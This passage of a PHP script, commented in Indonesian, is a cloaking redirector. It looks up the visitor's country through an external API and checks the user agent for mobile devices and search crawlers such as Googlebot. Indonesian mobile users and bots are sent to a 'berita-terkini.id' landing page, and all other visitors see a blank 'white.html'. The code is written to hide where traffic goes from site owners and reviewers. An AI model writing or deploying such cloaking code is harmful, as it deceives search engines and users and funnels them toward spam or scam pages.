';
print_r($data);
echo '';
// Periksa apakah key 'country' ada dalam data
$country = isset($data['country']) ? $data['country'] : null;
// Mendapatkan user agent
$userAgent = $_SERVER['HTTP_USER_AGENT'];
// Debug: Tampilkan user-agent
echo "User-Agent: " . $userAgent . "
";
echo "Country: " . $country . "
";
// Daftar keyword untuk mendeteksi perangkat mobile
$mobileKeywords = ['Android', 'iPhone', 'iPad', 'iPod', 'Windows Phone', 'webOS'];
$isMobile = false;
foreach ($mobileKeywords as $keyword) {
if (strpos($userAgent, $keyword) !== false) {
$isMobile = true;
break;
}
}
// Daftar bot yang umum (misalnya Googlebot)
$botList = ['Googlebot', 'Bingbot', 'Yahoo!', 'YandexBot', 'Baiduspider','Slurp', 'DuckDuckBot', 'Sogou', 'Exabot', 'facebookexternalhit'];
$isBot = false;
foreach ($botList as $bot) {
if (strpos($userAgent, $bot) !== false) {
$isBot = true;
break;
}
}
// Debug: Tampilkan status mobile dan bot
echo "Is Mobile: " . ($isMobile ? 'Yes' : 'No') . "
";
echo "Is Bot: " . ($isBot ? 'Yes' : 'No') . "
";
// Pastikan jika negara Indonesia dan mobile atau bot, redirect ke landing page
if ($country === 'Indonesia' && ($isMobile || $isBot)) {
header("Location: https://berita-terkini.id/ppdb-halmaheraselatankab/");
exit(); // Pastikan untuk menghentikan eksekusi lebih lanjut
} else {
echo file_get_contents('white.html'); // Menampilkan halaman putih
}
} else {
echo 'Tidak dapat mengambil data dari API.';
}
?>